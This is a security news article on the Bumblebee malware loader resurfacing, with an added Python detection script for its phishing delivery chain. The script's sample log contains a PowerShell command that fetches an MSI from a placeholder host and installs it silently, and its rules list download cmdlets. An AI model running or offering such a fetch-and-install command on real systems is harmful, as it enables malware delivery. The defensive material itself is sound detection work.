Bumblebee is back in the game: malware mimics NVIDIA drivers

Netskope reports the first signs of the rebirth of the well-known malware loader.

The Bumblebee malicious downloader has resurfaced in the wild more than four months after its activity was halted by Europol's international operation "Endgame" in May this year.

Bumblebee, according to experts, was created by the developers of TrickBot and first appeared in 2022 as a replacement for BazarLoader. This downloader grants ransomware groups access to victims' networks.

The main distribution methods of Bumblebee are phishing, malvertising, and SEO poisoning. It has been spread disguised as apps such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the typical payloads that Bumblebee delivers are Cobalt Strike beacons, information stealers, and various ransomware strains.

In May, as part of Operation Endgame, law enforcement seized more than a hundred servers supporting the activities of several malicious downloaders, including IcedID, Pikabot, TrickBot, Bumblebee, Smokeloader, and SystemBC. Since then, Bumblebee has shown little activity. However, researchers from Netskope have recently recorded a new wave of attacks involving Bumblebee, which may indicate its return.

The attack chain begins with a phishing email offering to download a ZIP archive. Inside the archive there is a shortcut file (.LNK) called "Report-41952.lnk", which uses PowerShell to download a malicious MSI file disguised as an installer for an NVIDIA driver or the Midjourney program.

The MSI file is executed using the "msiexec.exe" utility in silent mode (/qn option), which eliminates any user interaction. To disguise its actions, the malware uses the MSI SelfReg table, which causes the DLL to be loaded directly into the "msiexec.exe" process and its exported functions to be called.
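The delivery chain described in the two paragraphs above (LNK, PowerShell download, silent msiexec install of a package dropped in a user-writable folder) leaves a recognisable pattern in process-creation telemetry. The following is an added detection sketch written for this post; it is not Netskope's code and is not taken from the original article. The log format (timestamp|parent_image|image|command_line), the sample lines, the host names and the URL are all constructed for illustration; the rule names are assumptions, not vendor rule identifiers.

```python
"""Flag the LNK -> PowerShell -> silent msiexec pattern in process-creation logs.

Added example for this post (not Netskope's tooling). Input is a constructed,
simplified Sysmon-Event-1-style record: timestamp|parent_image|image|command_line.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real indicators). Line 1-2: the phishing chain.
# Line 3: a normal interactive install. Line 4: a silent install by a management service.
SAMPLE_LOG = r"""
2024-10-01T09:12:04|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "iwr http://example.invalid/nvidia.msi -OutFile $env:TEMP\nvidia.msi; msiexec /i $env:TEMP\nvidia.msi /qn"
2024-10-01T09:12:09|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\alice\AppData\Local\Temp\nvidia.msi /qn
2024-10-01T10:40:00|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\alice\Downloads\7z2408-x64.msi
2024-10-01T11:05:22|C:\Windows\System32\svchost.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\ProgramData\Vendor\agent.msi /qn
"""

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# msiexec accepts /qn, /quiet (and the - prefix); /qn is the switch named in the article.
SILENT_FLAGS = re.compile(r"(?:^|\s)[/-]q(?:n|uiet)\b", re.I)
# Package dropped where an unprivileged user (or a phishing payload) can write.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\", re.I)
DOWNLOAD_CMDLETS = re.compile(
    r"\b(?:iwr|Invoke-WebRequest|curl|wget|DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I)
MSI_REF = re.compile(r"\.msi\b|msiexec", re.I)


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    ts: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list[Event]:
    """Parse the constructed pipe-separated format; blank lines are ignored."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(Event(ts, parent, image, cmdline))
    return events


def analyze(events: list[Event]) -> list[Finding]:
    """Apply three behavioural rules and return the findings in log order."""
    findings: list[Finding] = []
    for ev in events:
        img, par = basename(ev.image), basename(ev.parent)
        if img == "msiexec.exe":
            silent = bool(SILENT_FLAGS.search(ev.cmdline))
            # Rule 1: a script host (PowerShell here) launching a silent install.
            if silent and par in SCRIPT_HOSTS:
                findings.append(Finding(ev.ts, "silent_msiexec_from_script_host",
                                        f"{par} -> {ev.cmdline}"))
            # Rule 2: silent install of a package sitting in Temp or Downloads.
            if silent and USER_WRITABLE.search(ev.cmdline):
                findings.append(Finding(ev.ts, "silent_msiexec_user_writable_package",
                                        ev.cmdline))
        elif img in {"powershell.exe", "pwsh.exe"}:
            # Rule 3: PowerShell fetching an MSI (or invoking msiexec) in one command line.
            if DOWNLOAD_CMDLETS.search(ev.cmdline) and MSI_REF.search(ev.cmdline):
                findings.append(Finding(ev.ts, "powershell_download_then_msiexec",
                                        ev.cmdline))
    return findings


if __name__ == "__main__":
    for f in analyze(parse_log(SAMPLE_LOG)):
        print(f"{f.ts}  {f.rule}: {f.detail}")
```

On the sample above, the two lines of the phishing chain produce three findings while the interactive 7-Zip install and the service-driven silent install produce none; in a real deployment the third rule is the noisiest and is best paired with the parent-process rule rather than alerted on alone.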

When deployed, Bumblebee loads its payload into memory and begins unpacking it. The researchers noted that the new variant uses the string 'NEW_BLACK' to decrypt its configuration, and that it carries two campaign IDs - 'msi' and 'lnk001'.

Although Netskope did not provide data on the scale of the campaign and the types of payloads loaded, the study highlights early signs of a possible resurgence of Bumblebee. The full list of indicators of compromise is available on GitHub.

The return of Bumblebee is a reminder that even after successful operations against cyber threats, there is no need to let your guard down – new malicious activity can always emerge from the shadows, changing appearance, but not intention.
